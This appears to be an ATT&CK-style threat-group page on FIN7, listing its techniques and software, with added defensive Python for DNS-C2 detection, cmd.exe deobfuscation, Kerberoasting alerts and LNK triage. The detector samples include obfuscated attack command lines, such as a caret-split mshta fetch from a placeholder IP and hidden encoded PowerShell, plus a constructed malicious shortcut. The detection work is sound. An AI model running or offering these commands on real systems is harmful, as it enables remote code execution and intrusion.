FIN7

FIN7 is a financially motivated threat group that has been active since 2013. FIN7 has primarily targeted the retail, restaurant, hospitality, software, consulting, financial services, medical equipment, cloud services, media, food and beverage, transportation, and utilities industries in the U.S. A portion of FIN7 was run out of a front company called Combi Security, and the group often used point-of-sale malware in its targeting. Since 2020, FIN7 has shifted operations to a big game hunting (BGH) approach, including the use of REvil ransomware and its own Ransomware as a Service (RaaS), Darkside. FIN7 may be linked to the Carbanak Group, but several groups appear to use Carbanak malware, so they are tracked separately.(Citation: FireEye FIN7 March 2017)(Citation: FireEye FIN7 April 2017)(Citation: FireEye CARBANAK June 2017)(Citation: FireEye FIN7 Aug 2018)(Citation: CrowdStrike Carbon Spider August 2021)(Citation: Mandiant FIN7 Apr 2022)
ID: G0046
Associated Groups: Carbon Spider, ITG14, Sangria Tempest, GOLD NIAGARA, ELBRUS
Version: 4.0
Created: 31 May 2017
Last Modified: 17 Apr 2024

Associated Group Descriptions

Name Description
Carbon Spider (Citation: CrowdStrike Carbon Spider August 2021)
ITG14 ITG14 shares campaign overlap with FIN7.(Citation: IBM Ransomware Trends September 2020)
Sangria Tempest (Citation: Microsoft Threat Actor Naming July 2023)
GOLD NIAGARA (Citation: Secureworks GOLD NIAGARA Threat Profile)
ELBRUS (Citation: Microsoft Ransomware as a Service)

Techniques Used

Domain ID Name Use
Enterprise T1583 .001 Acquire Infrastructure: Domains

FIN7 has registered look-alike domains for use in phishing campaigns.(Citation: eSentire FIN7 July 2021)

.006 Acquire Infrastructure: Web Services

FIN7 has set up Amazon S3 buckets to host trojanized digital products.(Citation: Mandiant FIN7 Apr 2022)

Enterprise T1071 .004 Application Layer Protocol: DNS

FIN7 has performed C2 using DNS via A, OPT, and TXT records.(Citation: FireEye FIN7 Aug 2018)
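A detection that a defender would want for this technique, written here as an added example (it is not ATT&CK's or FireEye's code): group resolver-log queries by client and registered domain, then flag pairs that issue repeated TXT lookups whose leftmost label looks like encoded data. Note that OPT is the EDNS0 pseudo-record carried in the additional section rather than a query type, so it will not normally appear in resolver query logs; the check therefore keys on TXT volume and label entropy. The log lines, the domain `lookalike-updates.com`, the client addresses and the thresholds are all constructed assumptions.

```python
import math
from collections import defaultdict

# Constructed resolver log: "<client> <qtype> <qname>" per line. Invented for this
# example; lookalike-updates.com is a placeholder, not a real FIN7 indicator.
SAMPLE_LOG = """\
10.0.0.5 A www.example.com
10.0.0.5 A cdn.example.com
10.0.0.7 TXT 7a3f9c1e2b4d.stage.lookalike-updates.com
10.0.0.7 TXT 91bd02ee77ac.stage.lookalike-updates.com
10.0.0.7 A 4ce1f0aa93d7.stage.lookalike-updates.com
10.0.0.7 TXT d0e4a7b19f3c.stage.lookalike-updates.com
10.0.0.7 TXT 5f6e8d2c0b1a.stage.lookalike-updates.com
10.0.0.9 TXT _dmarc.example.com
10.0.0.9 A mail.example.com
"""


def shannon_entropy(s):
    """Bits per character; hex/base32-encoded data sits well above natural labels."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in (s.count(ch) for ch in set(s)))


def registered_domain(qname):
    """Last two labels. Assumption: a real deployment would consult the public suffix list."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def parse_log(text):
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 3:
            rows.append({"client": parts[0], "qtype": parts[1].upper(), "qname": parts[2].lower()})
    return rows


def find_dns_c2_candidates(rows, min_txt=3, min_entropy=3.0):
    """Flag (client, domain) pairs with repeated TXT lookups whose leftmost label
    looks like encoded data. Thresholds are assumptions to tune per environment."""
    groups = defaultdict(list)
    for r in rows:
        groups[(r["client"], registered_domain(r["qname"]))].append(r)
    findings = []
    for (client, domain), qs in groups.items():
        txt = sum(q["qtype"] == "TXT" for q in qs)
        mean_e = sum(shannon_entropy(q["qname"].split(".")[0]) for q in qs) / len(qs)
        if txt >= min_txt and mean_e >= min_entropy:
            findings.append({"client": client, "domain": domain, "queries": len(qs),
                             "txt_queries": txt, "mean_label_entropy": round(mean_e, 2)})
    return sorted(findings, key=lambda f: -f["txt_queries"])


if __name__ == "__main__":
    for finding in find_dns_c2_candidates(parse_log(SAMPLE_LOG)):
        print(finding)
```

Only the 10.0.0.7 client is reported: four TXT queries to one domain with 12-character hex labels. Mail servers legitimately generate TXT traffic (SPF, DKIM, DMARC lookups), so in practice the domain list is baselined per client role before alerting.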

Enterprise T1547 .001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

FIN7 malware has created Registry Run and RunOnce keys to establish persistence, and has also added items to the Startup folder.(Citation: FireEye FIN7 April 2017)(Citation: FireEye FIN7 Aug 2018)

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

FIN7 used a PowerShell script to launch shellcode that retrieved an additional payload.(Citation: FireEye FIN7 April 2017)(Citation: Morphisec FIN7 June 2017)(Citation: FBI Flash FIN7 USB)(Citation: Mandiant FIN7 Apr 2022)

.003 Command and Scripting Interpreter: Windows Command Shell

FIN7 used the command prompt to launch commands on the victim’s machine.(Citation: FireEye FIN7 Aug 2018)(Citation: Flashpoint FIN 7 March 2019)(Citation: Mandiant FIN7 Apr 2022)

.005 Command and Scripting Interpreter: Visual Basic

FIN7 used VBS scripts to help perform tasks on the victim's machine.(Citation: FireEye FIN7 Aug 2018)(Citation: Flashpoint FIN 7 March 2019)(Citation: CrowdStrike Carbon Spider August 2021)

.007 Command and Scripting Interpreter: JavaScript

FIN7 used JavaScript scripts to help perform tasks on the victim's machine.(Citation: FireEye FIN7 Aug 2018)(Citation: Flashpoint FIN 7 March 2019)

Enterprise T1543 .003 Create or Modify System Process: Windows Service

FIN7 created new Windows services and added them to the startup directories for persistence.(Citation: FireEye FIN7 Aug 2018)

Enterprise T1587 .001 Develop Capabilities: Malware

FIN7 has developed malware for use in operations, including the creation of infected removable media.(Citation: FBI Flash FIN7 USB)(Citation: FireEye FIN7 Oct 2019)

Enterprise T1546 .011 Event Triggered Execution: Application Shimming

FIN7 has used application shim databases for persistence.(Citation: FireEye FIN7 Shim Databases)

Enterprise T1567 .002 Exfiltration Over Web Service: Exfiltration to Cloud Storage

FIN7 has exfiltrated stolen data to the MEGA file sharing site.(Citation: CrowdStrike Carbon Spider August 2021)

Enterprise T1559 .002 Inter-Process Communication: Dynamic Data Exchange

FIN7 spear phishing campaigns have included malicious Word documents with DDE execution.(Citation: CyberScoop FIN7 Oct 2017)

Enterprise T1036 .004 Masquerading: Masquerade Task or Service

FIN7 has created a scheduled task named “AdobeFlashSync” to establish persistence.(Citation: Morphisec FIN7 June 2017)

.005 Masquerading: Match Legitimate Resource Name or Location

FIN7 has attempted to run Darkside ransomware with the filename sleep.exe.(Citation: CrowdStrike Carbon Spider August 2021)

Enterprise T1027 .010 Obfuscated Files or Information: Command Obfuscation

FIN7 has used fragmented strings, environment variables, standard input (stdin), and native character-replacement functionalities to obfuscate commands.(Citation: FireEye Obfuscation June 2017)(Citation: FireEye FIN7 Aug 2018)(Citation: CrowdStrike Carbon Spider August 2021)
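The cmd.exe tricks listed above (string fragments joined through `set` variables, substring and character-replacement expansion of environment variables, caret insertion, and feeding the real command over stdin with `echo ... | cmd`) can be reversed mechanically. The normaliser below is an added example, not code from FireEye or ATT&CK: it emulates enough of cmd's expansion rules to recover the command that would finally run, then reports which script hosts were visible only after normalisation. The `ENV` value for `%COMSPEC%`, the `WATCH` list, and the five sample command lines (including the TEST-NET address 203.0.113.10 and the base64 string) are constructed assumptions. Two simplifications to be aware of: carets are stripped everywhere, although cmd treats them literally inside double quotes, and `set` values are expanded into later segments as `call`/delayed expansion would, which is what the fragment trick relies on anyway.

```python
import re

# Assumption: a typical %COMSPEC% value, needed to resolve substring tricks.
ENV = {"COMSPEC": r"C:\Windows\system32\cmd.exe"}
# Hosts whose names an attacker wants to keep out of a plain string match.
WATCH = ("powershell", "mshta", "wscript", "cscript", "rundll32", "regsvr32", "certutil")

WRAPPER_RE = re.compile(r'^\s*"?(?:[^"\s]*\\)?cmd(?:\.exe)?"?\s+/[ck]\s+(.*)$', re.I | re.S)
SET_RE = re.compile(r'^\s*set\s+"?([^=\s"]+)=(.*?)"?\s*$', re.I | re.S)
VAR_RE = re.compile(r'%([A-Za-z_][A-Za-z0-9_]*)'      # variable name
                    r'(?::~(-?\d+)(?:,(-?\d+))?'       # :~start[,len]  substring
                    r'|:([^=%]+)=([^%]*))?%')          # :old=new       replacement


def unwrap(cmdline):
    """Strip a leading 'cmd /c' (or /k) and the quotes around its argument."""
    m = WRAPPER_RE.match(cmdline)
    if not m:
        return cmdline
    body = m.group(1).strip()
    if len(body) >= 2 and body[0] == '"' and body[-1] == '"':
        body = body[1:-1]
    return body


def split_segments(s):
    """Split on &, &&, |, || outside double quotes -> [(segment, separator)]."""
    parts, buf, quoted, i = [], "", False, 0
    while i < len(s):
        c = s[i]
        if c == '"':
            quoted = not quoted
        if not quoted and c in "&|":
            sep = s[i:i + 2] if s[i:i + 2] in ("&&", "||") else c
            parts.append((buf, sep))
            buf, i = "", i + len(sep)
            continue
        buf += c
        i += 1
    parts.append((buf, ""))
    return parts


def expand_vars(text, env):
    """Expand %VAR%, %VAR:~start,len% and %VAR:old=new% against env."""
    def repl(m):
        name = m.group(1).upper()
        if name not in env:
            return m.group(0)                    # unknown variable: leave it visible
        val = env[name]
        if m.group(2) is not None:               # substring
            start = int(m.group(2))
            start = max(len(val) + start, 0) if start < 0 else start
            if m.group(3) is None:
                return val[start:]
            length = int(m.group(3))
            return val[start:start + length] if length >= 0 else val[start:len(val) + length]
        if m.group(4) is not None:               # replacement, case-insensitive like cmd
            return re.sub(re.escape(m.group(4)), lambda _: m.group(5), val, flags=re.I)
        return val
    return VAR_RE.sub(repl, text)


def normalize(cmdline, env=None):
    """Recover the command cmd.exe would finally run. `set` segments are folded into
    env and expanded into later segments (delayed, call-style expansion)."""
    env = dict(ENV if env is None else env)
    kept = []
    for seg, sep in split_segments(unwrap(cmdline.replace("^", ""))):
        seg = expand_vars(seg, env)
        m = SET_RE.match(seg)
        if m:                                    # definition: remember it, emit nothing
            env[m.group(1).upper()] = m.group(2)
            continue
        seg = re.sub(r"^\s*call\s+", "", seg, flags=re.I)
        seg = seg.replace('""', "")              # empty quote pairs inserted to break matching
        if WRAPPER_RE.match(seg):
            seg = normalize(seg, env)            # nested cmd /c "..."
        seg = " ".join(seg.split())
        if seg:
            kept.append((seg, sep))
    i = 0                                        # stdin trick: echo <command> | cmd
    while i < len(kept) - 1:
        (seg, sep), (nxt, nsep) = kept[i], kept[i + 1]
        m = re.match(r"^echo\s+(.*)$", seg, re.I)
        if sep == "|" and m and re.match(r"^(?:.*\\)?cmd(?:\.exe)?$", nxt, re.I):
            kept[i:i + 2] = [(normalize(m.group(1), env), nsep)]
            continue
        i += 1
    return "".join(seg + (f" {sep} " if sep and i < len(kept) - 1 else "")
                   for i, (seg, sep) in enumerate(kept))


def hidden_keywords(cmdline, env=None):
    """Watched hosts that appear only after normalisation, i.e. were hidden on purpose."""
    raw, norm = cmdline.lower(), normalize(cmdline, env).lower()
    return [k for k in WATCH if k in norm and k not in raw]


SAMPLES = [  # constructed command lines, one per trick
    'cmd /c "set x=pow&&set y=ershell&&call %x%%y% -nop -w hidden -enc SQBFAFgA"',
    "cmd /c m^s^h^t^a http://203.0.113.10/x.hta",
    'cmd /c "set z=%COMSPEC:~-7,3%&&set w=paxershell&&call %z% /c %w:ax=ow% -nop"',
    "cmd /c dir C:\\Users",
    'cmd /c "echo p^o^w^e^r^s^h^e^l^l -nop | cmd"',
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s}\n  -> {normalize(s)}   hidden: {hidden_keywords(s)}")
```

Run over process-creation telemetry (Sysmon Event 1 or Security 4688 command lines), `hidden_keywords` returning a non-empty list is a far stronger signal than a match on the raw string, because a benign command line has no reason to assemble `powershell` from fragments.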

.016 Obfuscated Files or Information: Junk Code Insertion

FIN7 has used random junk code to obfuscate malware code.(Citation: Mandiant FIN7 Apr 2022)

Enterprise T1588 .002 Obtain Capabilities: Tool

FIN7 has utilized a variety of tools such as Cobalt Strike, PowerSploit, and the remote management tool, Atera for targeting efforts.(Citation: Mandiant FIN7 Apr 2022)

Enterprise T1069 .002 Permission Groups Discovery: Domain Groups

FIN7 has used the command `net group "domain admins" /domain` to enumerate domain groups.(Citation: Mandiant FIN7 Apr 2022)

Enterprise T1566 .001 Phishing: Spearphishing Attachment

FIN7 sent spearphishing emails with either malicious Microsoft Documents or RTF files attached.(Citation: FireEye FIN7 April 2017)(Citation: DOJ FIN7 Aug 2018)(Citation: Flashpoint FIN 7 March 2019)(Citation: eSentire FIN7 July 2021)(Citation: CrowdStrike Carbon Spider August 2021)

.002 Phishing: Spearphishing Link

FIN7 has conducted broad phishing campaigns using malicious links.(Citation: CrowdStrike Carbon Spider August 2021)

Enterprise T1021 .001 Remote Services: Remote Desktop Protocol

FIN7 has used RDP to move laterally in victim environments.(Citation: CrowdStrike Carbon Spider August 2021)

.004 Remote Services: SSH

FIN7 has used SSH to move laterally through victim environments.(Citation: CrowdStrike Carbon Spider August 2021)

.005 Remote Services: VNC

FIN7 has used TightVNC to control compromised hosts.(Citation: CrowdStrike Carbon Spider August 2021)

Enterprise T1053 .005 Scheduled Task/Job: Scheduled Task

FIN7 malware has created scheduled tasks to establish persistence.(Citation: FireEye FIN7 April 2017)(Citation: Morphisec FIN7 June 2017)(Citation: FireEye FIN7 Aug 2018)(Citation: Flashpoint FIN 7 March 2019)

Enterprise T1608 .001 Stage Capabilities: Upload Malware

FIN7 has staged legitimate software, that was trojanized to contain an Atera agent installer, on Amazon S3.(Citation: Mandiant FIN7 Apr 2022)

.004 Stage Capabilities: Drive-by Target

FIN7 has compromised a digital product website and modified multiple download links to point to trojanized versions of offered digital products.(Citation: Mandiant FIN7 Apr 2022)

Enterprise T1558 .003 Steal or Forge Kerberos Tickets: Kerberoasting

FIN7 has used Kerberoasting PowerShell commands such as `Invoke-Kerberoast` for credential access and to enable lateral movement.(Citation: CrowdStrike Carbon Spider August 2021)(Citation: Mandiant FIN7 Apr 2022)
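Kerberoasting leaves a distinctive trace on the domain controller: one user account requests TGS tickets (Event ID 4769) for many distinct service principals within seconds, typically with RC4-HMAC encryption (type 0x17) because those hashes crack far faster than AES. The check below is an added example, not ATT&CK's or CrowdStrike's detection content: it slides a time window over the 4769 records per requesting account and reports bursts of distinct SPNs, along with the RC4 share and source addresses. The events (reduced to TargetUserName, ServiceName, TicketEncryptionType, IpAddress and Status), the realm `CORP.LOCAL`, the thresholds and the window are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Event ID 4769 (TGS request) records, reduced to the fields the check
# needs. Invented for this example; not taken from any incident.
EVENTS = [
    {"time": "2024-04-17T09:00:01", "account": "alice@CORP.LOCAL", "service": "svc_sql",
     "enc": "0x17", "ip": "10.0.0.7", "status": "0x0"},
    {"time": "2024-04-17T09:00:02", "account": "alice@CORP.LOCAL", "service": "svc_web",
     "enc": "0x17", "ip": "10.0.0.7", "status": "0x0"},
    {"time": "2024-04-17T09:00:02", "account": "alice@CORP.LOCAL", "service": "svc_backup",
     "enc": "0x17", "ip": "10.0.0.7", "status": "0x0"},
    {"time": "2024-04-17T09:00:03", "account": "alice@CORP.LOCAL", "service": "svc_sharepoint",
     "enc": "0x17", "ip": "10.0.0.7", "status": "0x0"},
    {"time": "2024-04-17T09:00:03", "account": "alice@CORP.LOCAL", "service": "WS042$",
     "enc": "0x12", "ip": "10.0.0.7", "status": "0x0"},       # machine account SPN: normal
    {"time": "2024-04-17T09:05:10", "account": "bob@CORP.LOCAL", "service": "svc_sql",
     "enc": "0x12", "ip": "10.0.0.9", "status": "0x0"},       # single AES ticket: normal
    {"time": "2024-04-17T11:00:00", "account": "alice@CORP.LOCAL", "service": "svc_print",
     "enc": "0x17", "ip": "10.0.0.7", "status": "0x0"},       # outside the burst window
    {"time": "2024-04-17T11:00:01", "account": "WS042$@CORP.LOCAL", "service": "svc_sql",
     "enc": "0x12", "ip": "10.0.0.42", "status": "0x0"},      # computer accounts are excluded
]


def is_user_tgs(e):
    """Successful request by a user account for a service that is not a machine account."""
    user = e["account"].split("@")[0]
    return (e["status"] == "0x0" and not user.endswith("$")
            and not e["service"].endswith("$") and e["service"].lower() != "krbtgt")


def find_kerberoast_bursts(events, min_services=4, window=timedelta(minutes=10)):
    """One account requesting tickets for >= min_services distinct SPNs inside `window`.
    Thresholds are assumptions; tune them to the environment's baseline."""
    by_account = defaultdict(list)
    for e in events:
        if is_user_tgs(e):
            by_account[e["account"]].append((datetime.fromisoformat(e["time"]), e))
    findings = []
    for account, rows in by_account.items():
        rows.sort(key=lambda r: r[0])
        best = None
        for i, (t0, _) in enumerate(rows):
            hits = [e for t, e in rows[i:] if t - t0 <= window]
            spns = {e["service"].lower() for e in hits}
            if len(spns) >= min_services and (best is None or len(spns) > best["distinct_services"]):
                best = {"account": account, "window_start": t0.isoformat(),
                        "distinct_services": len(spns),
                        "rc4_fraction": round(sum(e["enc"] == "0x17" for e in hits) / len(hits), 2),
                        "source_ips": sorted({e["ip"] for e in hits})}
        if best:
            findings.append(best)
    return findings


if __name__ == "__main__":
    for f in find_kerberoast_bursts(EVENTS):
        print(f)
```

The burst count is the primary signal; the RC4 fraction is corroboration, since an AES-only domain would show the same burst with type 0x12 tickets. Honeytoken service accounts (an SPN nobody legitimately uses) turn this from a threshold rule into a near-zero-false-positive one.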

Enterprise T1553 .002 Subvert Trust Controls: Code Signing

FIN7 has signed Carbanak payloads with legally purchased code signing certificates. FIN7 has also digitally signed their phishing documents, backdoors and other staging tools to bypass security controls.(Citation: FireEye CARBANAK June 2017)(Citation: FireEye FIN7 Aug 2018)

Enterprise T1195 .002 Supply Chain Compromise: Compromise Software Supply Chain

FIN7 has gained initial access by compromising a victim's software supply chain.(Citation: Mandiant FIN7 Apr 2022)

Enterprise T1218 .005 System Binary Proxy Execution: Mshta

FIN7 has used mshta.exe to run VBScript that executed malicious code on victim systems.(Citation: FireEye FIN7 April 2017)

.011 System Binary Proxy Execution: Rundll32

FIN7 has used `rundll32.exe` to execute malware on a compromised network.(Citation: Mandiant FIN7 Apr 2022)

Enterprise T1204 .001 User Execution: Malicious Link

FIN7 has used malicious links to lure victims into downloading malware.(Citation: CrowdStrike Carbon Spider August 2021)

.002 User Execution: Malicious File

FIN7 lured victims to double-click on images in the attachments they sent which would then execute the hidden LNK file.(Citation: FireEye FIN7 April 2017)(Citation: eSentire FIN7 July 2021)(Citation: CrowdStrike Carbon Spider August 2021)
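When the object hidden behind the image is a Windows shortcut, mail-gateway or sandbox triage can answer the important questions (what does it launch, with what arguments, and is the window hidden) directly from the file, without executing it. The parser below is an added example and not code from FireEye, eSentire or ATT&CK: it reads the Shell Link header (MS-SHLLINK), skips the optional LinkTargetIDList and LinkInfo sections, decodes the StringData fields, and flags shortcuts whose target or arguments name a script host or whose ShowCommand minimises the window. Because a real phishing LNK cannot be embedded here, `build_sample_lnk` constructs minimal shortcuts for the demonstration; the target paths, the `%PUBLIC%\invoice.hta` argument and the `SCRIPT_HOSTS` list are assumptions.

```python
import re
import struct
import uuid

LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")
(HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH,
 HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE) = (1 << i for i in range(8))
SW_SHOWMINNOACTIVE = 7          # ShowCommand that keeps the launched window minimised
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))
# Assumption: binaries a document shortcut has no business launching.
SCRIPT_HOSTS = ("mshta", "wscript", "cscript", "powershell", "cmd.exe", "rundll32", "regsvr32")


def build_sample_lnk(relative_path, arguments, icon_location, show_cmd):
    """Constructed minimal Shell Link: 76-byte header plus StringData only."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, LNK_CLSID.bytes_le, flags,
                         0x20, 0, 0, 0, 0, 0, show_cmd, 0, 0, 0, 0)

    def string_data(s):                      # CountCharacters (2 bytes) + UTF-16LE text
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + string_data(relative_path) + string_data(arguments) + string_data(icon_location)


def is_lnk(data):
    return (len(data) >= 0x4C and struct.unpack_from("<I", data)[0] == 0x4C
            and uuid.UUID(bytes_le=bytes(data[4:20])) == LNK_CLSID)


def parse_lnk(data):
    """Return ShowCommand and the StringData fields of a Shell Link."""
    if not is_lnk(data):
        raise ValueError("not a Shell Link file")
    flags, = struct.unpack_from("<I", data, 20)
    show_cmd, = struct.unpack_from("<I", data, 60)
    off = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDListSize (2 bytes) + IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize (4 bytes) counts itself
        off += struct.unpack_from("<I", data, off)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {"show_command": show_cmd}
    for flag, name in STRING_FIELDS:
        if flags & flag:
            count, = struct.unpack_from("<H", data, off)
            off += 2
            nbytes = count * 2 if unicode else count
            fields[name] = bytes(data[off:off + nbytes]).decode("utf-16-le" if unicode else "cp1252")
            off += nbytes
    return fields


def triage_lnk(data):
    """Reasons an attached .lnk deserves analyst attention (empty list: nothing found)."""
    f = parse_lnk(data)
    target = f.get("relative_path", f.get("name", "")).lower()
    args = f.get("arguments", "").lower()
    reasons = []
    if any(h in target for h in SCRIPT_HOSTS):
        reasons.append(f"target is a script/proxy host: {target}")
    if any(h in args for h in SCRIPT_HOSTS) or re.search(r"\.(hta|vbs|js|ps1)\b", args):
        reasons.append(f"arguments reference a script: {f['arguments']}")
    if f["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("window minimised on launch (SW_SHOWMINNOACTIVE)")
    return reasons


# Constructed samples: a lure-style shortcut and an ordinary one.
MALICIOUS_LNK = build_sample_lnk(r"..\..\..\Windows\System32\mshta.exe", r'"%PUBLIC%\invoice.hta"',
                                 r"%SystemRoot%\System32\shell32.dll", SW_SHOWMINNOACTIVE)
BENIGN_LNK = build_sample_lnk(r"..\..\..\Windows\System32\notepad.exe", "",
                              r"%SystemRoot%\System32\notepad.exe", 1)

if __name__ == "__main__":
    for label, blob in (("lure", MALICIOUS_LNK), ("benign", BENIGN_LNK)):
        print(label, parse_lnk(blob), triage_lnk(blob))
```

The same parser applied to a shortcut with a LinkTargetIDList will skip the ID list correctly but will not resolve the target it encodes; for those, `name` and `relative_path` are usually still populated, and the ID list's terminal item is the next thing to decode.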

Enterprise T1078 .003 Valid Accounts: Local Accounts

FIN7 has used compromised credentials for access as SYSTEM on Exchange servers.(Citation: Microsoft Ransomware as a Service)

Enterprise T1497 .002 Virtualization/Sandbox Evasion: User Activity Based Checks

FIN7 used images embedded into document lures that only activate the payload when a user double clicks to avoid sandboxes.(Citation: FireEye FIN7 April 2017)

Enterprise T1102 .002 Web Service: Bidirectional Communication

FIN7 used legitimate services like Google Docs, Google Scripts, and Pastebin for C2.(Citation: FireEye FIN7 Aug 2018)

Software

ID Name References Techniques
S0417 GRIFFON (Citation: CrowdStrike Carbon Spider August 2021) (Citation: FBI Flash FIN7 USB) (Citation: Microsoft Ransomware as a Service) (Citation: SecureList Griffon May 2019) Scheduled Task, Screen Capture, JavaScript, Domain Groups, System Information Discovery, PowerShell, Registry Run Keys / Startup Folder, System Time Discovery
S0416 RDFSNIFFER (Citation: FireEye FIN7 Oct 2019) Native API, File Deletion, Credential API Hooking
S0151 HALFBAKED (Citation: FireEye FIN7 April 2017) (Citation: FireEye FIN7 Aug 2018) Windows Management Instrumentation, Screen Capture, System Information Discovery, Process Discovery, PowerShell, File Deletion
S0194 PowerSploit (Citation: CrowdStrike Carbon Spider August 2021) (Citation: GitHub PowerSploit May 2012) (Citation: Mandiant FIN7 Apr 2022) (Citation: PowerShellMagazine PowerSploit July 2014) (Citation: PowerSploit Documentation) Scheduled Task, Windows Management Instrumentation, Screen Capture, Keylogging, Path Interception by PATH Environment Variable, Audio Capture, Local Account, Windows Service, DLL, Credentials in Registry, Data from Local System, Reflective Code Loading, Security Support Provider, Path Interception by Search Order Hijacking, LSASS Memory, Domain Trust Discovery, Group Policy Preferences, Process Discovery, PowerShell, Registry Run Keys / Startup Folder, Indicator Removal from Tools, Path Interception by Unquoted Path, Query Registry, Path Interception, Windows Credential Manager, Command Obfuscation, Access Token Manipulation, Kerberoasting, Dynamic-link Library Injection
S0145 POWERSOURCE (Citation: Cisco DNSMessenger March 2017) (Citation: DNSMessenger) (Citation: FireEye FIN7 March 2017) DNS, PowerShell, Registry Run Keys / Startup Folder, Query Registry, Ingress Tool Transfer, NTFS File Attributes
S0146 TEXTMATE (Citation: Cisco DNSMessenger March 2017) (Citation: DNSMessenger) (Citation: FireEye FIN7 March 2017) DNS, Windows Command Shell
S0415 BOOSTWRITE (Citation: FireEye FIN7 Oct 2019) Shared Modules, Encrypted/Encoded File, DLL, Code Signing, Deobfuscate/Decode Files or Information
S0030 Carbanak (Citation: Anunak) (Citation: CrowdStrike Carbon Spider August 2021) (Citation: DOJ FIN7 Aug 2018) (Citation: FBI Flash FIN7 USB) (Citation: FireEye CARBANAK June 2017) (Citation: FireEye FIN7 Aug 2018) (Citation: FireEye FIN7 March 2017) (Citation: Fox-It Anunak Feb 2015) (Citation: IBM Ransomware Trends September 2020) (Citation: Kaspersky Carbanak) (Citation: Mandiant FIN7 Apr 2022) Screen Capture, Standard Encoding, Keylogging, OS Credential Dumping, Local Email Collection, Symmetric Cryptography, Remote Access Tools, Local Account, Portable Executable Injection, Process Discovery, Registry Run Keys / Startup Folder, Obfuscated Files or Information, Query Registry, Data Transfer Size Limits, Windows Command Shell, File Deletion, Web Protocols, Remote Desktop Protocol, Custom Command and Control Protocol, Commonly Used Port
S0390 SQLRat (Citation: Flashpoint FIN 7 March 2019) Scheduled Task, Malicious File, Deobfuscate/Decode Files or Information, PowerShell, Windows Command Shell, Command Obfuscation, File Deletion, Ingress Tool Transfer
S0154 Cobalt Strike (Citation: CrowdStrike Carbon Spider August 2021) (Citation: FBI Flash FIN7 USB) (Citation: Mandiant FIN7 Apr 2022) (Citation: cobaltstrike manual) Windows Management Instrumentation, Screen Capture, Rundll32, Standard Encoding, Keylogging, JavaScript, Bypass User Account Control, Sudo and Sudo Caching, Security Account Manager, DNS, Domain Account, Symmetric Cryptography, Windows Service, Domain Groups, SSH, System Service Discovery, Code Signing, Network Share Discovery, Application Layer Protocol, Native API, Data from Local System, Deobfuscate/Decode Files or Information, Process Injection, Timestomp, Reflective Code Loading, Scheduled Transfer, SMB/Windows Admin Shares, Protocol Tunneling, Browser Session Hijacking, Modify Registry, Windows Remote Management, LSASS Memory, Distributed Component Object Model, System Network Configuration Discovery, Office Template Macros, File and Directory Discovery, System Network Connections Discovery, Token Impersonation/Theft, Make and Impersonate Token, Process Discovery, Parent PID Spoofing, PowerShell, Multiband Communication, File Transfer Protocols, Local Groups, Disable or Modify Tools, Indicator Removal from Tools, Process Hollowing, Exploitation for Privilege Escalation, Obfuscated Files or Information, Exploitation for Client Execution, Asymmetric Cryptography, Non-Application Layer Protocol, Protocol or Service Impersonation, Query Registry, Data Transfer Size Limits, Domain Accounts, BITS Jobs, Domain Fronting, Python, Windows Command Shell, Web Protocols, Visual Basic, Remote System Discovery, Network Service Discovery, Software Discovery, Pass the Hash, Ingress Tool Transfer, Remote Desktop Protocol, Service Execution, Dynamic-link Library Injection, Internal Proxy, Custom Command and Control Protocol, Commonly Used Port, Local Accounts, Process Argument Spoofing
S0496 REvil (Citation: CrowdStrike Carbon Spider August 2021) (Citation: Cylance Sodinokibi July 2019) (Citation: FBI Flash FIN7 USB) (Citation: G Data Sodinokibi June 2019) (Citation: Group IB Ransomware May 2020) (Citation: IBM Ransomware Trends September 2020) (Citation: Intel 471 REvil March 2020) (Citation: Kaspersky Sodin July 2019) (Citation: McAfee REvil October 2019) (Citation: McAfee Sodinokibi October 2019) (Citation: Microsoft Ransomware as a Service) (Citation: Picus Sodinokibi January 2020) (Citation: Secureworks GandCrab and REvil September 2019) (Citation: Secureworks REvil September 2019) (Citation: Sodin) (Citation: Sodinokibi) (Citation: Talos Sodinokibi April 2019) (Citation: Tetra Defense Sodinokibi March 2020) Windows Management Instrumentation, Fileless Storage, Encrypted/Encoded File, Match Legitimate Resource Name or Location, Service Stop, Malicious File, Safe Mode Boot, Domain Groups, Spearphishing Attachment, System Service Discovery, System Information Discovery, Native API, Deobfuscate/Decode Files or Information, Process Injection, Mutual Exclusion, Modify Registry, Create Process with Token, File and Directory Discovery, Token Impersonation/Theft, Exfiltration Over C2 Channel, PowerShell, Disable or Modify Tools, Data Encrypted for Impact, Asymmetric Cryptography, System Language Discovery, Query Registry, Windows Command Shell, Data Destruction, File Deletion, Drive-by Compromise, Web Protocols, Visual Basic, Ingress Tool Transfer, Inhibit System Recovery
S0002 Mimikatz (Citation: Adsecurity Mimikatz Guide) (Citation: CrowdStrike Carbon Spider August 2021) (Citation: Deply Mimikatz) Security Account Manager, LSA Secrets, Credentials from Password Stores, Security Support Provider, Rogue Domain Controller, Credentials from Web Browsers, Private Keys, LSASS Memory, Golden Ticket, Pass the Ticket, Steal or Forge Authentication Certificates, Account Manipulation, SID-History Injection, Silver Ticket, Windows Credential Manager, Pass the Hash, DCSync
